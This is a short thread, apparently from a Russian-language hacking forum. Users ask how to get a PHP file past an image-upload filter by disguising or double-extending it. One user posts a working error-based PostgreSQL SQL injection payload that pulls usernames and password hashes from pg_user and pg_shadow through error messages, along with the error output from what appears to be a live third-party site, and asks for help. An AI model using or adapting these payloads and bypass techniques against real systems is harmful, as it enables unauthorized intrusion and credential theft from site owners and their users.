Можно заставить файл аплоад думать, что я загружаю пнг/джпг и загружать пхп?

Всё зависит от настроек сервера и кода скрипта.

Можешь например тут почитать: https://rdot.org/forum/showpost.php?p=1142&postcount=5

P.S. По мотивам оригинального вопроса вспомнился этот пост: /showpost.php?p=1473083&postcount=13

Пожалуйста

Спасибо

Можно ли *.php.jpeg как-нибудь переименовать, чтобы отсечь .jpeg?

Переименовать в *.php - отсекает jpeg с гарантией.

Каков вопрос - таков и ответ.

Два раза подряд нахожу SQL inj в PostgreSQL

И никак не пойму почему при таком запросе:

'+and+1=cast((SELECT+usename||chr(58)||passwd+FROM +pg_user+LIMIT+1+OFFSET+1)+as+int)--

выдает:

Warning: ERROR: invalid input syntax for integer: "xxx3:********" query: select src from url_alias where dst='firms' and 1=cast((SELECT usename||chr(58)||passwd FROM pg_user LIMIT 1 OFFSET 1) as int)--' in /web/XXX/www/includes/database.pgsql.inc on line 160

пароль под звездочками...!

Что не так?

П.с.g_shadow - доступа нет.

брал аналогию запроса:

'+and+1=cast((SELECT+usename||chr(58)||passwd+FROM +pg_shadow+LIMIT+1+OFFSET+1)+as+int)--

Query failed: ERROR: invalid input syntax for integer: "pg_database" in /web/XXX/www/includes/database.pgsql.inc on line 139

Потому что в pg_user не хранится пасс(http://www.postgresql.org/docs/8.3/static/view-pg-user.html), ну а на pg_shadow нужны рутовые права(к слову).

Тогда получается, что получить данные практически невозможно?

Какие данные?